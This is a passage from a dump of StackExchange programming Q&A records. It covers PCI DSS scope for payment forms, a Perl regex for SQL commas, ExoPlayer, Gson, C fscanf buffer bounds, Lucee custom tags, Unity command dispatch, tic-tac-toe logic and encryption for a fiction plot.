It is only when it is at rest.\nMoving through the standard, pretty much everything else will apply, Systems should be hardened (Requirement 2), Anti-virus (if it's a system \"commonly affected by viruses\") and patch management (Requirement 5), good Software Development processes (Requirement 6) - not forgetting the legendary 6.6, code review or WAF.\nStrong access controls (Requirements 7 and 8), Physical security (9), Logging and monitoring (10), regular testing (11) and good information security management (12) will all apply as far as I can see.\nWithout any of these elements if I were the attacker I would simply target Site B and grab the data either straight off the server as it's input by the customer or as it transmits out of Site B into Site A.\nThis is actually a common scenario in the payment processing world (think PayPal, WorldPay, etc). \"Merchants\" (someone taking credit card payments) typically have two choices when they wish to integrate with a payment processor to take credit card payments. \n1) They receive the card data themselves, typically through a web form and then POST that data to the payment processor's API for authorisation, etc. This is typically done by the larger merchants. They process the response and update their systems and respond to the customer appropriately.\n2) They \"redirect\" the customer to the payment processor who then takes the card data through a form on their own website so the merchant never sees the card data at all. The merchant is typically then updated as the success of the order by some \"out of band\" HTTP POST to the merchant's website. The customer obviously has an immediate on screen result.\nIn option 1, the merchant would be required to achieve full PCI DSS compliance. In option 2 the merchant does not have a need to comply as they are not storing, processing or transmitting card data.\nIf Site B is not currently in scope of your PCI DSS compliance and you wish to keep it that way, I would suggest you develop a means to take the payment data directly on Site A and Site B just points people that way.\nI hope this was useful. I've got a lot of experience with the PCI DSS so would be happy to discuss further. Standard disclaimer though, I'm not a QSA so any decisions regarding scope should be verified with a Qualified Security Assessor before beginning work.\nComment: Only (nitpicking) comment: `I'm not a QSA` - even if you *were* **a** QSA it wouldn't matter, as you are not *his* QSA, and whomever that is gets to make the calls anyway :D\nComment: Excellent answer, well done. +1.\nComment: Yeh, spot on and fair point. Thanks for feedback and vote. :-)\nComment: Thank you for taking the time to break this down for me. Much appreciated.\nAnswer: In short the PCI-DSS states that credit card information must never be in plain text. That being said you shouldn't whip up your own protocol for this. 
HTTPS is a great solution.\n","meta":{"source":"security.stackexchange","title":"How to submit credit card info to a separate server\/website (PCI)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using Perl to move commas from end of line to begining of line\n\nQuestion: I've inherited a few dozen sql scripts that look like this:\n<code>select\n column_a,\n column_b,\n column_c\nfrom\n my_table\n<\/code>\nTo format them so they match the rest of our sql library, I'd like to change them to look like this:\n<code>select\n column_a\n ,column_b\n ,column_c\nfrom\n my_table\n<\/code>\nwhere the commas start at the beginning of the line instead of at the end. I've taken a few passes at this in Perl, but haven't been able to get it to work just right. \nCan any of you Perl gods provide some enlightenment here?\nComment: I would rather correct the rest of the library.\nComment: @Svante: you probably don't like the \"perlish\" coding style either (http:\/\/ysth.info\/pcs.html)\nAnswer: <code>perl -pi.bak -0777 -wle's\/,[^\\n\\S]*\\n([^\\n\\S]*)\/\\n$1,\/g' file1.sql file2.sql ...\n<\/code>\nThe character class is any non-newline whitespace.\n-0777 causes it to operate on whole files, not lines.\n","meta":{"source":"stackoverflow","title":"Using Perl to move commas from end of line to begining of line","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to add player control ui in google IO18 audio App demo\n\nQuestion: What am I trying to do:\nUsing google exoPlayer to play music, foreground and background.\nBreak into details:\n\nThe app launches, google exoPlayer playback control UI should be visible and starts to play immediately.\nAs soon as the player starts to play, we should see the notification (Using exoplayer's <code>PlayerNotificationManager<\/code> )\nUser exits the app either by pressing the back button or swipe from the recent task, the player service should keep running in foreground with notification.\nUser taps the notification, it should bring up the app.\n\nWhat I have done:\nI followed google IO18 on this link\nhttps:\/\/www.youtube.com\/watch?v=svdq1BWl4r8&t=1990s\nWhile I am following the above youtube link, especially the audio app part, I realize one thing, how do you pros add player control UI into this app?\ne.g, the app is onDestory, user quits. Then user taps on the notification, back to the MainActivity, there is nothing there, it's an empty screen, question is, how do you add play control ui in here?\nI have looked into https:\/\/github.com\/googlesamples\/android-UniversalMusicPlayer tyring to figure out this. However, the Universal Android Music Player Sample is using a giant notification (Not PlayerNotificationManager see on IO18) and custom player UI (Not ExoPlayer out of box control UI) which is confusing me a lot.\nPlease, please, please help.\nHow to add player control ui in the following code.\nhttps:\/\/github.com\/bizkitj\/MediaSessionExoPlayer\/tree\/ExoPlayerGoogleIO2018\nIf you can , please not only show me how you do it, I also need to know why did you do it? Break into steps.\nVersion of ExoPlayer being used:\n<code>implementation 'com.google.android.exoplayer:exoplayer-core:2.8.0' \nimplementation 'com.google.android.exoplayer:exoplayer-ui:2.8.0'\nimplementation 'com.google.android.exoplayer:extension-mediasession:2.8.0'\n<\/code>\nPlease be noted, I am tyring to build things upon the googleIO18 demo app. 
This demo app is using exoPlayer's <code>PlayerNotificationManager<\/code> which is great to keep sync with <code>MediaSession<\/code>, I do not want to change this <code>PlayerNotificationManager<\/code> to android <code>Notification.MediaStyle<\/code>.\nThank you.\nComment: I think this is what you're trying to accomplish https:\/\/stackoverflow.com\/a\/52680590\/9419047\nComment: HI did your problem solved ? I also had the same issue. Please help\nComment: @krishnamn. nope, I wish someone from exoPlayer could answer this, apperently. No. Sad.\nAnswer: Since your question is rather about some best practice of managing UI, I try to explain with some general idea:\n1- You need a background service which plays the audio and returns <code>START_NOT_STICKY<\/code> \n2- It starts forground as soon as your <code>PlayerNotificationManager<\/code> listener calls back with some <code>notificationId<\/code> and <code>notification<\/code> \n3- in your Activity, you bind to the background service which plays the music. this would be better to happen in <code>onStart<\/code> \n4- unbind from the service on <code>onStop<\/code> \nin this way you will have access to the ExoPlayer instance which is working in the background service, you will be able to attach listeners, views, etc. to it as per requirement. Then you will be able to check if there is anything playing to bring up the proper UI\nI wish this is helpful for you. Good luck\nComment: Thank you for the answer and sorry for my very very late response. However, I am looking for a rather detailed step since I am still on the learning path. With your answer, I have to maybe spend hours of searching to 'convert' them into practical code.\n","meta":{"source":"stackoverflow","title":"how to add player control ui in google IO18 audio App demo","dup_signals":{}},"subset":"stackexchange"} +{"text":"Set SQLite data to JsonObject class without using Stringbuilder\n\nQuestion: Am retrieving information from my SQLite database to display on CardView\nMy SQLite database structure is SQLite DB\nMy class is\n<code> public class ServiceRequest{\n public String reqid;\n public String name;\n public String branch;\n public Date date;\n public Date time;\n public String services;\n \/\/Getter and setter\n .............\n .............\n }\n<\/code>\nI can convert this to JSON format using \n<code> List<ServiceRequest> reqs = getAllReqs();\n List<ServiceRequest> jobservList = new ArrayList<>();\n\n for (ServiceRequest access : reqs) {\n ServiceRequest ob = new ServiceRequest();\n\n ob.setId(access.getId());\n ob.setBranch(access.getBranch());\n ob.setName(access.getName());\n ob.setDate(access.getDate());\n ob.setTime(access.getTime());\n ob.setServices(access.getServices());\n jobservList.add(ob);\n }\n\n Gson gson = new GsonBuilder().setPrettyPrinting().create();\n String json2 = gson.toJson(jobservList);\n return json2;\n<\/code>\nbut my desired JSONObject format is\n<code>{ \n \"100\": {\n\n \"name\": \"Rahul Suresh\",\n \"branch\": \"Koramangala\",\n \"phNumber\":\"123456\",\n \"date\": \"2016-08-06\",\n \"time\": \"16:00\",\n \"reqServices\": \"Loans\"\n },\n \"200\": {\n \"name\": \"Sidh\",\n \"branch\": \"Jayanagar\",\n \"phNumber\":\"182694\",\n \"date\": \"2016-08-12\",\n \"time\": \"11:00\",\n \"reqServices\": \"OpenAcc,SafeDeposit\"\n }\n }\n<\/code>\nso that I will get one whole JSON object with a single call\n<code>JSONObject jb = (JSONObject) jsonObject.get(Integer.toString(id));\n<\/code>\n100,200 are 'reqid' s\nIt's possible to achieve this using 
string builder. But is there any other ways to implement this like using an object mapper along with a class or something..?\nComment: Your class structure is not correct if you want to use an object mapper like Gson or Jackson. The ID would have to be in the inner object, not the key\nComment: @cricket_007 Ya am aware of that...Since I want JSON on the given format am searching a way other than making a string builder.\nComment: It is possible with a Hashmap of integer to your class, then have Gson convert that\nComment: @cricket_007 Can you gimme a small sketch how that class will be?!!\nAnswer: If you would like to form the JSON you have shown, you could \"pull out\" the ID into a HashMap key, then set the value to be your object. \nI can't remember how Gson handles the conversion of the object values in the map, but this is the general idea\n<code>List<ServiceRequest> reqs = getAllReqs();\n\nHashMap<Integer, ServiceRequest> map = new HashMap<Integer, ServiceRequest>();\nfor (ServiceRequest access : reqs) {\n map.put(access.getId(), access);\n}\n\nGson gson = new GsonBuilder().setPrettyPrinting().create();\nString json2 = gson.toJson(map); \/\/ TODO: Not sure if this will work\nreturn json2;\n<\/code>\n","meta":{"source":"stackoverflow","title":"Set SQLite data to JsonObject class without using Stringbuilder","dup_signals":{}},"subset":"stackexchange"} +{"text":"Array containing more characters than specified\n\nQuestion: I am learning file management in C. I wrote this code and the output wasn't what I expected. \n<code>#include <stdio.h>\n\nint main(int argc, char * argv[]){\n int i;\n char str[12];\n FILE *fp;\n fp = fopen(\"Names.dat\", \"w+\");\n for(i = 1; i < argc; i++){\n fprintf(fp, \"%s \", argv[i]);\n }\n rewind(fp);\n fscanf(fp,\"%[^\\n]\", str);\n printf(\"%s\", str);\n return 0;\n}\n<\/code>\nI compiled it and ran it as follows\n<code>gcc test.c\na abcdefghijklmnopqrstuvwxyz\n<\/code>\nThe output was as follows:\n<code>abcdefghijklmnopqrstuvwxyz\n<\/code>\nI thought it would output only first 12 letters.\nWhere did I go wrong in my thought process?\nAnswer: <code>fscanf(fp,\"%[^\\n]\", str);<\/code> attempts to read characters and writes them to memory, starting at str, until '\\n' or EOF is encountered, regardless of the length of str\nSo, with\n\n<code>char str[12];\n...\nfscanf(fp,\"%[^\\n]\", str);\n<\/code>\n\nreading the string of 27 characters \"abcdefghijklmnopqrstuvwxyz \" from the file writes 28 characters from &str[0] and has an unspecified behavior (probably a crash). 
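\n(Side note: if you want the overflow to fail loudly rather than appear to \"work\", compiling the same test.c with AddressSanitizer, e.g. <code>gcc -g -fsanitize=address test.c<\/code>, should flag the out-of-bounds write at the exact spot; the portable fix is the field width shown below.)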
\n\nArray containing more characters than specified\n\nno, <code>str[12]<\/code> allows you to store 11 characters plus the terminating null character, nothing more.\nTo read at most 11 characters from the file, do:\n<code>fscanf(fp,\"%11[^\\n]\", str);\n<\/code>\nDoing that, compilation and execution:\n<code>pi@raspberrypi:\/tmp $ gcc -g -pedantic -Wextra m.c\npi@raspberrypi:\/tmp $ .\/a.out abcdefghijklmnopqrstuvwxyz\nabcdefghijkpi@raspberrypi:\/tmp $ \n<\/code>\nand under valgrind:\n<code>pi@raspberrypi:\/tmp $ valgrind .\/a.out abcdefghijklmnopqrstuvwxyz\n==10408== Memcheck, a memory error detector\n==10408== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.\n==10408== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info\n==10408== Command: .\/a.out abcdefghijklmnopqrstuvwxyz\n==10408== \nabcdefghijk==10408== \n==10408== HEAP SUMMARY:\n==10408== in use at exit: 352 bytes in 1 blocks\n==10408== total heap usage: 3 allocs, 2 frees, 5,472 bytes allocated\n==10408== \n==10408== LEAK SUMMARY:\n==10408== definitely lost: 0 bytes in 0 blocks\n==10408== indirectly lost: 0 bytes in 0 blocks\n==10408== possibly lost: 0 bytes in 0 blocks\n==10408== still reachable: 352 bytes in 1 blocks\n==10408== suppressed: 0 bytes in 0 blocks\n==10408== Rerun with --leak-check=full to see details of leaked memory\n==10408== \n==10408== For counts of detected and suppressed errors, rerun with: -v\n==10408== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 6 from 3)\n<\/code>\nP.S. add a \\n in the printf, <code>printf(\"%s\\n\", str);<\/code>, or use puts to have a more readable result:\n<code>pi@raspberrypi:\/tmp $ gcc -g -pedantic -Wextra m.c\npi@raspberrypi:\/tmp $ .\/a.out abcdefghijklmnopqrstuvwxyz\nabcdefghijk\npi@raspberrypi:\/tmp $ \n<\/code>\nP.S. of course, to read 12 characters from the file, do\n<code>char str[13];\n...\nfscanf(fp,\"%12[^\\n]\", str);\n<\/code>\nAnswer: Even though you allocated an array of size 12, this doesn't mean you cannot write (or read) beyond its boundaries.\n<code>fscanf<\/code> expects a pointer as its third argument, and pointers carry no information about length, so <code>fscanf<\/code> cannot know how much memory you allocated; this is the responsibility of the caller.\nC is very liberal when it comes to accessing memory ;) \nComment: This answer is crudely written. The fact that the array size is 12 **does** mean you cannot read or write beyond its boundaries while strictly conforming to the C standard. It ought to be explained in what senses one can attempt to read or write beyond the array and what the possible consequences are.\n","meta":{"source":"stackoverflow","title":"Array containing more characters than specified","dup_signals":{}},"subset":"stackexchange"} +{"text":"Associating child tag data with grandparent tag using CFC-based custom tags\n\nQuestion: The full repro case for this question is in my GitHub repository.
I'll only reproduce the necessary bits here.\nLet's say I have this usage of some custom tags:\n<code><!--- testCfcTags.cfm --->\n<cfimport taglib=\"cfcBasedTags\" prefix=\"t\">\n\nText before tags<br>\n<t:grandparent gp:attr=\"set in grandparent\">\n Text in grandparent, before parent<br>\n <t:parent p:attr=\"set in parent\">\n Text in parent, before child<br>\n <t:child c:attr=\"set in child\">\n Text in child<br>\n <\/t:child>\n Text in parent, after child<br>\n <\/t:parent>\n Text in grandparent, after parent<br>\n<\/t:grandparent>\nText after tags<br>\n<\/code>\nIf I was using CFM-based custom tags, and I was to want to associate data from within my implementation of the <code>child<\/code> tag with the <code>grandparent<\/code> tag, I would simply to this:\n<code><!--- child.cfm --->\n<cfif thistag.executionMode eq \"end\">\n <cfassociate basetag=\"cf_grandparent\" datacollection=\"childAttributesForGrandparent\"><!--- this line --->\n <cfassociate basetag=\"cf_parent\" datacollection=\"childAttributesForParent\">\n<\/cfif>\n<\/code>\nNote I can associate directly to the grandparent tag.\nI cannot work out how to do this cleanly with Lucee's CFC-based custom tags.\nThis is the best I can come up with:\n<code>\/\/ Child.cfc\ncomponent {\n\n function init(hasEndTag, parent){\n this.parent = arguments.parent;\n }\n\n function onEndTag(attributes, caller, generatedContent){\n writeOutput(generatedContent);\n this.parent.childattributesForParent = attributes;\n this.parent.parent.childattributesForGrandparent = attributes;\n return false;\n }\n\n}\n<\/code>\nAnd in Parent.cfc I have this:\n<code>\/\/ Parent.cfc\ncomponent {\n\n function init(hasEndTag, parent){\n this.parent = arguments.parent;\n }\n\n function onEndTag(attributes, caller, generatedContent){\n writeOutput(generatedContent);\n this.parent.parentattributesForGrandparent = attributes;\n writeDump(var=this.childAttributesForParent, label=\"Parent childAttributesForParent\");\n return false;\n }\n\n}\n<\/code>\nThat cumulative (mis-)usage of the <code>this<\/code> scope of Parent and Grandparent means from Child I can bung stuff straight into the Grandparent via <code>this.parent.parent<\/code>.\nHowever that's all a bit \"Heath Robinson\". Given the rest of Lucee's CFC-based custom tag implementation is pretty slick, I am sure I'm just missing something. I really don't think I ought to have to burrow through the Parent to get to the Grandparent. Also it means that the code would need to differ for situations in which the Child is directly within the Grandparent. What I really need is for some tag-hierarchy to be passed between CFCs, not simply the parent.\nI've googled about, but most of what's out there is written by me (which is in turn based on the blog articles originally written for Railo's implementation of this - which is what the Lucee implementation is based on).\nDocs I've already read, which are no help:\n\nRailo: CFC-based custom tags\nCFC-based Custom Tags by Example - Part 1\nCFC-based Custom Tags by Example - Part 2\nCFC-based Custom Tags by Example - Part 3\nComment: Is it worth tagging this as coldfusion and railo too... 
those who are maybe using lucee but not following the tag yet might miss this?\nAnswer: According to the Railo blog:\nhttp:\/\/blog.getrailo.com\/post.cfm\/cfc-based-custom-tags-by-example-part-1\n\nYou can use the tag cfassociate and the function GetBaseTagList and >GetBaseTagData the same way as for regular CFML based custom tags.\n\nSo you can do (in cfscript):\n<code>cfassociate(basetag=\"cf_grandparent\", datacollection=\"childAttributesForGrandparent\"); \n<\/code>\nI've thrown together a gist with some samples - I've tested and verified it works on Lucee 4.5.1:\nhttps:\/\/gist.github.com\/dajester2013\/183e862915972d51279f\nEdit: Option 2, base tag approach:\nBased on my comment, here is a potential approach via base tag - it at leasts masks the not-so-pretty aspects:\nBaseTag.cfc\n<code>component accessors=true {\n\n property name=\"tagName\";\n property name=\"parent\";\n property name=\"hasEndTag\";\n\n public BaseTag function init() {\n structAppend(variables, arguments);\n\n tagName = \"cf_\" & lcase(listLast(getMetaData(this).fullname,\".\"));\n\n return this;\n }\n\n public any function getParent(string tagName, ancestors=1) {\n if (!isNull(tagName)) {\n\n var data = getBaseTagData(tagName, ancestors);\n if (structKeyExists(data,\"thisTag\")) {\n return data.thisTag;\n\n \/\/ getBaseTagData returns the variables scope for CFC tags...\n } else if (structKeyExists(data, \"this\")) {\n return data.this;\n }\n } else if (!isNull(variables.parent)) {\n return variables.parent;\n }\n }\n\n private void function associate(required string tagName, string dataCollection=this.getTagName()) {\n cfassociate(basetag=tagname, dataCollection=dataCollection);\n }\n\n}\n<\/code>\nTestChild.cfc\n<code>component extends=BaseTag {\n\n public function onStartTag() {\n attributes._childId = randrange(1000,9000);\n associate(\"cf_testtag\", \"testchildren\");\n\n writedump(var=this.getParent(),label='immediateparent');\n writedump(var=this.getParent(\"cf_testtag\"), label='testtag');\n abort;\n }\n\n}\n<\/code>\nComment: Cheers, but yeah, I know that (I link to the same article above). But that's kinda \"in spite\" of the CFC-based approach to the issue, not in-complement to it. If you read the next sentence in the article \"These features are not really easy to use, so we looked for another way of interaction between tags\" Micha kinda alludes to the idea that using `` is not the preferred way to do this sort of thing with CFC-based custom tags. However doesn't go on to say how one *should* do this via another mechanism. I suspect they have simply overlooked it.\nComment: Another option would be to implement a base component you extend all your tags from. Inside that base component you would define some accessor methods. I'm thinking something along the lines of ExtJS's component selectors: `this.up(\"tag_name\");`\n","meta":{"source":"stackoverflow","title":"Associating child tag data with grandparent tag using CFC-based custom tags","dup_signals":{}},"subset":"stackexchange"} +{"text":"Unity c# Firing another GameObject's methods. Better way?\n\nQuestion: I have TCP client (Unity c#) and server (WinForms app c#). 
I need my server sending some JSON commands, like this: \n<code>{ \"\"ObjName\"\": \"\"Cube_2\"\", \"\"Method\"\":\"\"MoveLeft\"\", \"\"Delay\"\":0}\n<\/code>\nThis particular command says to find GameObject \"Cube_2\" and fire method \"MoveLeft\".\nWhen I receive this from the server, I convert it into my AOSCommand class:\n<code>public class AOSCommand\n{\n public string ObjName;\n public string Method;\n public int delay;\n}\n<\/code>\nAnd then I do the following (which I think is not the best solution, so here is a question):\n<code>private void ProcessCommand(AOSCommand command)\n {\n GameObject cube = GameObject.Find(command.ObjName);\n MonoBehaviour script = cube.GetComponent(command.ObjName.Split(new string[] {\"\"_\"\"}, StringSplitOptions.None)[0]) as MonoBehaviour;\n script.Invoke(command.Method, command.delay);\n }\n<\/code>\nHow can I fire a method from the AOSCommand.Method string in a better way?\nThe script attached to Cube_2 (and Cube_1, and it may be attached to an unknown number of other objects):\n<code>using UnityEngine;\n\npublic class Cube : MonoBehaviour {\n\n private GameObject thisObj;\n\n private void Start()\n {\n thisObj = this.gameObject;\n }\n\n public void MoveLeft()\n {\n thisObj.transform.Translate(new Vector3(1,0,0));\n }\n\n public void MoveRight()\n {\n thisObj.transform.Translate(new Vector3(-1, 0, 0));\n }\n}\n<\/code>\nAnswer: It depends on what you consider wrong.\nYou should have a single script that takes care of the parsing of the incoming data; this would remove the need to search for a component, since it would always be the same.\nThen you can have a dictionary of string to Action to replace the invoke call.\nSo your snippet turns into:\n<code>private void ProcessCommand(AOSCommand command)\n{\n GameObject cube = GameObject.Find(command.ObjName);\n AOSDispatch dispatch = cube.GetComponent<AOSDispatch>();\n if(dispatch == null){ return; } \/\/ or debug or exception\n dispatch.Call(command);\n}\n<\/code>\nthis is on the main receiver. Then comes the script on the cubes:\n<code>public class AOSDispatch : MonoBehaviour\n{\n Dictionary<string, Action> dict;\n void Start()\n {\n dict.Add(\"MoveLeft\", MoveLeft);\n dict.Add(\"MoveRight\", MoveRight);\n }\n public void Call(AOSCommand command)\n {\n if(dict.Contains(command.Method) == false){ return; } \/\/Or debug\n \/\/ use the delay as well as you wish\n dict[command.Method]();\n }\n private void MoveLeft(){} \n private void MoveRight(){}\n}\n<\/code>\nThis is not necessarily better, just my two cents on it.\nEDIT: there was a comment mentioning the json could contain the script type to know what script to use. I would not go this way.
AOSDispatch will take care of the dispatching of the message.\nMessage says MoveLeft, AOSDispatch can either treat the info or forward to a movement controller:\n<code>public class AOSDispatch : MonoBehaviour\n{\n [SerializeField] private MoveController moveCtrl = null;\n Dictionary<string, Action> dict;\n void Start()\n {\n dict.Add(\"MoveLeft\", this.moveCtrl.MoveLeft);\n dict.Add(\"MoveRight\", this.moveCtrl.MoveRight);\n }\n public void Call(AOSCommand command)\n {\n if(dict.Contains(command.Method) == false){ return; } \/\/Or debug\n \/\/ use the delay as well as you wish\n dict[command.Method]();\n }\n}\npublic class MoveController: MonoBehaviour\n{\n private void MoveLeft(){} \n private void MoveRight(){}\n}\n<\/code>\nthere you go, message is forward and cleanly, the AOSDispatch does only the job it is meant to do, dispatch the AOS.\nSECONDARY EDIT:\nOn second thought, here is an improved version.\nCreate a DispatchManager game object and add the following script:\n<code>public class AOSDispatch:MonoBehaviour\n{\n private IDictionary<string, AOSController> dict;\n void Awake(){\n this.dict = new Dictionary<string, AOSController>(); \n AOSController.RaiseCreation += ProcessCreation;\n AOSController.RaiseDestruction += ProcessDestruction;\n }\n void OnDestroy()\n {\n AOSController.RaiseCreation -= ProcessCreation;\n AOSController.RaiseDestruction -= ProcessDestruction;\n }\n private void ProcessCreation(AOSController controller){\n this.dict.Add(controller.name, controller);\n }\n private void ProcessDestruction(AOSController controller){\n AOSController temp= null;\n if(this.dict.TryGetValue(controller.name, out temp) == true){\n this.dict.Remove(name);\n }\n }\n private void ProcessCommand(AOSCommand command)\n {\n AOSController controller = null;\n if(this.dict.TryGetValue(command.ObjName, out controller) == true){\n controller.Call(command);\n return;\n }\n }\n}\n<\/code>\nand then on the objects you have the AOSController that forwards the info as before (just renaming):\n<code>public class AOSController: MonoBehaviour\n{\n public static event Action<AOSController> RaiseCreation;\n public static event Action<AOSController> RaiseDestruction;\n [SerializeField] private MoveController moveCtrl = null;\n Dictionary<string, Action> dict;\n void Start()\n {\n if(RaiseCreation != null) { RaiseCreation(this); }\n dict.Add(\"MoveLeft\", this.moveCtrl.MoveLeft);\n dict.Add(\"MoveRight\", this.moveCtrl.MoveRight);\n }\n void OnDestroy()\n {\n if(RaiseDestruction != null) { RaiseDestruction(this); }\n }\n public void Call(AOSCommand command)\n {\n if(dict.Contains(command.Method) == false){ return; } \/\/Or debug\n \/\/ use the delay as well as you wish\n dict[command.Method]();\n }\n}\npublic class MoveController: MonoBehaviour\n{\n private void MoveLeft(){} \n private void MoveRight(){}\n}\n<\/code>\nOn Awake, the Dispatch registers to the static event from the AOSController. In the AOSController.Start, the object triggers the event and passes itself to the AOSDispatch. That one adds it to the dictionary. On destruction, the AOSDispatch gets the event and removes the AOSController.\nNow you have a collection that at any given time contains all the AOSController in the scene.\nAs a result, you don't need to perform a GameObject.Find since you can get the object from the dictionary (real fast process). \nComment: Many thanks! 
I do think your way should be a little faster.\nComment: I'd also add a type to your Json command in order to use `FindObjectOfType` that's more typesafe.\nComment: You don't need the type if you rely on the AOSDispatch to know what to do.\nComment: @\u0418\u0432\u0430\u043d\u0414\u043e\u0431\u0440\u044f\u043a\u043e\u0432 I have added a secondary edit which uses events. If there is something you do not understand, please ask.\n","meta":{"source":"stackoverflow","title":"Unity c# Firing another GameObject's methods. Better way?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Declaring winner in tic tac toe board\n\nQuestion: I wrote a code for a tic tac toe problem where you input the numbers into the array and the board will be printed out. There is also a function that declares the winner, but doesn't seem to be working, the function is supposed to declares the winner for any size of a tic tac toe board (right now it is 5x5).\nI did a double for loop with it checking if the character is the same in the array as next to it so it moves along the rows, there's another for columns, one diagonal and the other. For some reason it isn't showing any winners, no winners always comes up. Any help is appreciated.\n<code>#include <stdio.h>\n\n#define TRUE 1\n#define FALSE 0\n\n#define SIZE 3\n\n#define NONE -1\n#define NOUGHTS 0\n#define CROSSES 1\n#define EMPTY 2\n\nvoid scanBoard(int board[SIZE][SIZE]);\nvoid printBoard(int board[SIZE][SIZE]);\nint getWinner(int board[SIZE][SIZE]);\n\nint main( void ){\n\n int board[SIZE][SIZE];\n int winner;\n\n printf(\"Please enter the board:\\n\");\n scanBoard( board );\n\n printf(\"Here is the board:\\n\");\n printBoard( board );\n\n printf(\"The winner is: \");\n\n winner = getWinner(board);\n\n if(winner == CROSSES){\nprintf(\"Crosses\");\n}\n else if(winner == NOUGHTS){\nprintf(\"Noughts\");\n}\n else{\nprintf(\"No one\");\n}\nreturn 0;\n}\n\nvoid scanBoard(int board[SIZE][SIZE]){\n\nint i;\nint j;\n\nfor(i=0; i<SIZE; i++){\n for(j=0; j<SIZE; j++){\n scanf(\"%d\", &board[i][j]);\n }\n}\n}\n\nvoid printBoard(int board[SIZE][SIZE]){\n\nint i;\nint j;\n\nfor(i=0; i<SIZE; i++){\n for(j=0; j<SIZE; j++){\n if(board[i][j] == EMPTY){\n printf(\". \");\n }\n else if(board[i][j] == CROSSES){\n printf(\"X \");\n }\n else if(board[i][j] == NOUGHTS){\n printf(\"O \");\n }\n } \n printf(\"\\n\"); \n}\n\n}\n\nint getWinner(int board[SIZE][SIZE]){\n\nint i;\nint j;\nint check;\nint winner;\n\nfor(i=0; i<SIZE; i++){\n for(j=0; j<SIZE-1 && check == TRUE; j++){\n if(board[i][j] != board[i][j+1]){\n check = FALSE;\n }\n }\n if(check == TRUE && j == SIZE-1){\n winner=board[i][0];\n }\n}\nfor(j=0; j<SIZE; j++){\n for(i=0; i<SIZE-1 && check == TRUE; i++){\n if(board[i][j] != board[i+1][j]){\n check = FALSE;\n }\n }\n if(check == TRUE && i == SIZE-1){\n winner=board[0][j];\n }\n}\nfor(i=0; i<SIZE-1 && check == TRUE; i++){\n if(board[i][i] != board[i+1][i+1]){\n check = FALSE;\n }\n if(check == TRUE && i == SIZE-1){\n winner=(board[i][i]);\n }\n}\nfor(i=SIZE; i>0 && check == TRUE; i--){\n if( board[i][i] != board[i-1][i-1])\n check = FALSE;\n}\n if(check == TRUE && i == SIZE-1){\n winner=(board[i][i]);\n}\nreturn winner;\n}\n<\/code>\nAnswer: As Giorgi pointed out, you have to initialize <code>check<\/code> before you start testing its value. 
You also need to initialize <code>winner<\/code> to <code>EMPTY<\/code> at the start of the <code>getWinner()<\/code> function, otherwise if there is no winner, your function will return some unpredictable junk value and your <code>main()<\/code> function will probably print out the wrong result.\n<code>int getWinner(int board[SIZE][SIZE]){\n int i;\n int j;\n int check;\n int winner=EMPTY \/* <<< *\/;\n\n for(i=0; i<SIZE; i++){\n for(j=0, check=TRUE \/* <<< *\/; j<SIZE-1 && check == TRUE; j++){\n if(board[i][j] != board[i][j+1]){\n check = FALSE;\n }\n }\n if(check == TRUE && j == SIZE-1){\n winner=board[i][0];\n }\n }\n for(j=0; j<SIZE; j++){\n for(i=0, check=TRUE \/* <<< *\/; i<SIZE-1 && check == TRUE; i++){\n if(board[i][j] != board[i+1][j]){\n \/** etc... **\/\n<\/code>\n(Note: There's also no need to continue checking once you've found a winner, so perhaps instead of <code>winner=board[i][j];<\/code> you could just <code>return board[i][j];<\/code>. Not a big deal, though.)\nYou are also checking one of the diagonals twice (in two different directions). The other diagonal isn't being checked at all.\nComment: Thanks for the help, It seemed to be initialising check=true before the second for loop worked. I'm going to look into the diagonals now but I think I got it now.\nAnswer: I did not go completely through your checking logic but here directly in <code>getWinner<\/code>, you are trigerring undefined behaviour:\n<code> for(j=0; j<SIZE-1 && check == TRUE; j++){\n<\/code>\nby reading <code>check<\/code> variable which has not been initialized (result of this is that any kind of behaviour can happen). So you may want to initialize it to default value first.\nThere are some implementationos of that game around, I suggest you look at some similar implementation and compare against your winner checking logic for example.\nComment: Thanks, just needed the extra bit of making check=TRUE did it.\nComment: 1) thanks for posting code that actually cleanly compiles. 2) Please, for us humans to easily read\/understand the code, consistently indent. Suggest 4 spaces after every opening brace '{' and un-indent before every closing brace '}' Never use tabs as every wordprocessor\/editor has the tab stops\/tab width set differently. Note: 4 spaces is wide enough so the indent is still visible with variable width fonts\nComment: a comparison like: `check == TRUE` is almost always a bad idea. (in this case we know what TRUE is equal to) Normally, anything not 0 is TRUE. So usually best to say things like: `if( check )` or `if( check != FALSE )`\n","meta":{"source":"stackoverflow","title":"Declaring winner in tic tac toe board","dup_signals":{}},"subset":"stackexchange"} +{"text":"Cryptography elements needed for a story\n\nQuestion: Note: following Maarten Bodewes's answer, I edited this post to make it clearer.\nI'm writing something partly driven by the need to crack a few encrypted files.\nThis is what needs to happen in the story:\nThere are two parties involved that are trying to crack them, party A and party B. Party A has had them for four years, and despite all attempts, they failed. Party B got the files later on and managed to crack them in less than two months of non-stop trying.\nParty A has available state-of the-art tech, but party B are the good guys and this is a sci-fi story, so they have far, far better tech that nobody else has. 
The details of the technology aren't relevant to the story so I don't need to establish them.\nParty B will eventually succeed; still, to keep a modicum of suspense up, it must still be possible for them to fail. By this I don't mean that something throws a spanner in their works; I mean that their decryption attempt, however more advanced than party B's, isn't guaranteed to work. In other words, party B can't just sit and wait until whatever they're doing is done knowing that at that point they will have the decrypted file.\nThis is what I need:\n\nAn algorithm such that, if you encrypt a file with it using a high-entropy password, is beyond any brute-force attempts using known methods and tech. (This is why party A fails.) I understand that AES-256 might be what I'm looking for.\nAn approach that will allow party B to succeed nonetheless. The fact that party B has much faster computers available than anyone on Earth is central to the story so you can assume that. However, if brute-forcing these files required ridiculous amounts of energy or other very unrealistic things, I'm not prepared to claim party B has any of that. Other approaches or situations that would give party B an edge\u2014such knowing what algorithm was used, being able to guess details about the password, or knowing about possible key files\u2014are certainly options I would consider. If quantum computers could plausibly break AES, that's another option I would consider because it's not too far-fetched for party B to have them. I just don't know if QC could actually do that.\nComment: Your biggest problem is not the technology. Your biggest problem is going to be that with this technology, you need a strong reason for your protagonists to focus on this problem and not something else. If you've aced quantum computing, for example, why would you do this and not 